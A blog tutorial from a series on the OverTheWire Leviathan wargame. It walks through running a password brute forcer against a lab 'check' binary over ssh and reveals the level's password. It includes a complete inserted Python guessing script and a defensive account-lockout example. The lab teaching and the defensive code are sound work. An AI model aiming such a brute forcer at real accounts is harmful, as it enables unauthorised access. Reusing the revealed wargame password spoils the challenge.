Custom Attacks: a complete brute force program
Welcome back to the 21st iteration of this blog series. In this series, we’re growing our cybersecurity knowledge starting from the very basics using the overthewire.org challenges as a guide. First, I’d like to thank everyone for their feedback based on the last post! I’ll do my best to implement it and as always, more feedback is always welcome.
In this post, we’ll deploy our own custom program to crack passwords. We’ll apply this to the first password guess we had to find in the Leviathan challenge series.
We’ve finally made it to the point of completing our program! Take a look at my version of the program:
Our first password guessing hurdle was back in the bandit challenges, and our simple loop to increment numbers did well there. In Leviathan 1 -> 2, we originally obtained the password by debugging the program and checking what our input was compared against. We already know the password for that was “sex”. Let’s run our program to see if we can guess that password:
The “blanks” are ignored with how I wrote the program. Aside from that, the program works well!
Running it against Leviathan can be done a couple of ways. The simplest is to copy our program to the machine and run it there. The second, and better, way is to execute our script through ssh directly. Generally, we log into a remote computer with ssh user@address; for the challenges we have also been specifying a port, and then we’re prompted for the password. ssh can also accept a command to run on the remote machine and return its output, without us having to log in and type it ourselves. We do this by putting the command in quotes at the end of our ssh command. In this case:
ssh leviathan1@leviathan.labs.overthewire.org -p 2223 "python3" < hard_brute.py
The quoted “python3” is the command that leviathan1’s shell runs on the remote machine. The redirect feeds our local hard_brute.py into ssh’s standard input, which ssh forwards to that remote python3; given no script argument, python3 reads the program from standard input, so the file never has to be copied over. Once the process completes, the output comes back to us:
There are a couple of things to keep in mind regarding speed and usage. The first is that we have to give the “check” process time to exit before we can execute it again with a new password: hence the “taking a nap” and “sleep 1” lines of code. This unfortunately slows our guessing to a crawl. The second is that although I’ve made my program interactive, it’s not very conducive to remote execution in this manner. Since the program collects information from the user as part of its execution, and standard input is already being used to deliver the script itself, there is nothing left for the prompts to read, so it doesn’t work well in this setting.
We can rewrite our code to accept command line arguments, much like the other commands we’ve been using in bash. The simpler and more immediate workaround, however, is to “hard code” the values into the program and not allow interaction. The script still prints its progress as it goes, and ssh relays that output back to us:
Running our attack like this is great: the remote computer is the one doing all the hard work, and we’re just waiting for the result. It has a downside, though: spawning the check binary thousands of times on the target is exactly the kind of activity that logging and security software are there to notice.
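Here is an added example of such a non-interactive brute forcer, written for this post rather than taken from the original program. It generates lowercase candidates shortest-first (with a resume point, like the “aax” start used later), runs the check binary once per guess with the guess on standard input, sleeps between attempts, prints progress to stderr, and takes all of its settings from command line arguments. The binary path /home/leviathan1/check, the lowercase-only alphabet, and the “Wrong password” failure string are assumptions, not facts from the post; adjust them to what the target actually prints.

```python
#!/usr/bin/env python3
"""Incremental brute forcer for a Leviathan-style `check` binary.

Added example for this post, not the original program. Assumptions are
marked in comments; nothing here is specific to a real password.
"""
import argparse
import itertools
import string
import subprocess
import sys
import time
from typing import Callable, Iterable, Iterator, Optional

ALPHABET = string.ascii_lowercase  # assumption: password is lowercase letters only


def candidates(min_len: int = 1, max_len: int = 3, start: Optional[str] = None,
               alphabet: str = ALPHABET) -> Iterator[str]:
    """Yield every string over `alphabet` from min_len to max_len characters,
    shortest first. `start` resumes a run partway through (e.g. "aax"):
    every guess that sorts before it is skipped."""
    for length in range(min_len, max_len + 1):
        for chars in itertools.product(alphabet, repeat=length):
            guess = "".join(chars)
            if start is not None and (length, guess) < (len(start), start):
                continue
            yield guess


def make_check_runner(binary: str, fail_marker: str = "Wrong password",
                      timeout: float = 5.0) -> Callable[[str], bool]:
    """Build a checker that runs `binary` once per guess, guess on stdin.

    Assumption: a wrong guess makes the binary print `fail_marker`; any other
    outcome (it exited quietly, or it did not exit at all, e.g. because it
    spawned a shell) is reported as a hit for the operator to inspect.
    Each call spawns a fresh process and waits for it, which is the
    per-attempt cost discussed above."""
    def check(guess: str) -> bool:
        try:
            proc = subprocess.run([binary], input=guess + "\n", capture_output=True,
                                  text=True, timeout=timeout)
        except subprocess.TimeoutExpired:
            return True
        return fail_marker not in (proc.stdout + proc.stderr)
    return check


def brute_force(check: Callable[[str], bool], guesses: Iterable[str],
                delay: float = 0.0, progress_every: int = 1000) -> Optional[str]:
    """Try each guess in order; return the first one `check` accepts, else None.
    Progress goes to stderr so it still shows up when run over ssh."""
    for n, guess in enumerate(guesses, 1):
        if check(guess):
            return guess
        if progress_every and n % progress_every == 0:
            print(f"[{n} tried] last guess: {guess}", file=sys.stderr, flush=True)
        if delay:
            time.sleep(delay)  # let the target process finish exiting between attempts
    return None


def main(argv: Optional[list] = None) -> int:
    # Command line arguments instead of input() prompts: nothing interactive,
    # so the script works when it is itself delivered on stdin over ssh.
    ap = argparse.ArgumentParser(description="brute force a check binary")
    ap.add_argument("--binary", default="/home/leviathan1/check")  # assumption
    ap.add_argument("--min-len", type=int, default=1)
    ap.add_argument("--max-len", type=int, default=3)
    ap.add_argument("--start", help="resume from this guess, e.g. aax")
    ap.add_argument("--delay", type=float, default=1.0,
                    help="seconds to sleep between attempts")
    args = ap.parse_args(argv)

    found = brute_force(make_check_runner(args.binary),
                        candidates(args.min_len, args.max_len, args.start),
                        delay=args.delay)
    if found is None:
        print("password not found in search space", file=sys.stderr)
        return 1
    print(f"password found: {found}")
    return 0


if __name__ == "__main__":
    sys.exit(main())
```

To run it remotely while still passing arguments, tell python3 to read the script from standard input with `-` and put the options after it: `ssh leviathan1@leviathan.labs.overthewire.org -p 2223 "python3 - --start aax --delay 1" < hard_brute.py`. Everything the script writes to stderr (progress) and stdout (the result) is relayed back through ssh.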
While that’s working, let’s explore another security principle: account lockouts. Account lockouts are one of the good countermeasures against brute forcing. In fact, the one-second wait we need between attempts in our current “attack” works like a crude version of the same idea: every failed attempt costs the attacker time. If you’re familiar with mobile phone passcodes, entering incorrect codes several times prevents further attempts for a period of time, and that period grows with each subsequent failure.
Account lockouts can also block any further attempts beyond a certain number and require an administrator to unlock the account. In the interest of time, I’ve gone ahead and set a start point for our attack closer to the password (aax). Here’s our result:
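To see the defender’s side of this, here is an added Python example (not from the original post) of the lockout behaviour described above: each failure doubles the wait before the next attempt is accepted, and after a fixed number of failures the account is hard-locked until an administrator clears it. The delay values and the failure threshold are assumptions chosen for illustration; the clock is passed in so the policy can be simulated without real sleeping.

```python
import hmac
from dataclasses import dataclass


@dataclass
class AccountLockout:
    """Escalating-delay lockout with an administrator-only hard lock.

    Added example; the numbers below are assumptions, not a real policy.
    `now` is supplied by the caller (seconds), so behaviour is deterministic.
    """
    base_delay: float = 1.0      # wait after the first failure
    max_delay: float = 300.0     # cap on the escalating wait
    hard_lock_after: int = 10    # failures before an admin must intervene
    failures: int = 0
    unlock_at: float = 0.0       # time at which the next attempt is accepted
    hard_locked: bool = False

    def delay_for(self, failures: int) -> float:
        """Delay doubles with every consecutive failure, capped at max_delay."""
        if failures <= 0:
            return 0.0
        return min(self.base_delay * 2 ** (failures - 1), self.max_delay)

    def attempt(self, password: str, correct: str, now: float) -> str:
        """Returns "ok", "wrong", "rate-limited" or "locked".

        During a wait window even the correct password is rejected, which is
        what makes a guessing loop like the one above stall."""
        if self.hard_locked:
            return "locked"
        if now < self.unlock_at:
            return "rate-limited"
        # constant-time compare so the check itself leaks nothing via timing
        if hmac.compare_digest(password.encode(), correct.encode()):
            self.failures = 0
            self.unlock_at = 0.0
            return "ok"
        self.failures += 1
        if self.failures >= self.hard_lock_after:
            self.hard_locked = True
            return "locked"
        self.unlock_at = now + self.delay_for(self.failures)
        return "wrong"

    def admin_unlock(self) -> None:
        """Only an administrator action clears a hard lock."""
        self.failures = 0
        self.unlock_at = 0.0
        self.hard_locked = False


def simulate_guessing(policy: AccountLockout, guesses, correct: str) -> tuple:
    """Feed guesses as fast as the policy allows; return (outcome, seconds used).

    The attacker always waits exactly until unlock_at, i.e. the best case
    for the attacker. Stops at the first "ok" or "locked"."""
    now = 0.0
    for guess in guesses:
        now = max(now, policy.unlock_at)
        result = policy.attempt(guess, correct, now)
        if result in ("ok", "locked"):
            return result, now
    return "exhausted", now
```

With base_delay=1 and max_delay=8, the tenth wrong guess triggers the hard lock after 1+2+4+8+8+8+8+8+8 = 55 seconds of waiting, and no amount of further guessing helps; the fourth-from-last attempt would be accepted only after the wait expires, which is exactly the “crawl” the attacker sees from the other side.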
Congratulations on completing your very own custom hacking tool! I’m sure you’ve had your share of complex challenges over the past couple of weeks. In fact, your current code may not have worked in practice even if it passed your testing. Mine needed some trimming before I could execute it over ssh. Embrace the challenges, the bugs, and the errors: they’re opportunities for you to expand your knowledge of how and why things work: the bread and butter of security.
To further hone your programming and hacking skills, improve on the current code and don’t be shy about looking at how others have tackled this issue. It goes without saying that “With great power comes great responsibility”. Use this knowledge wisely and legally.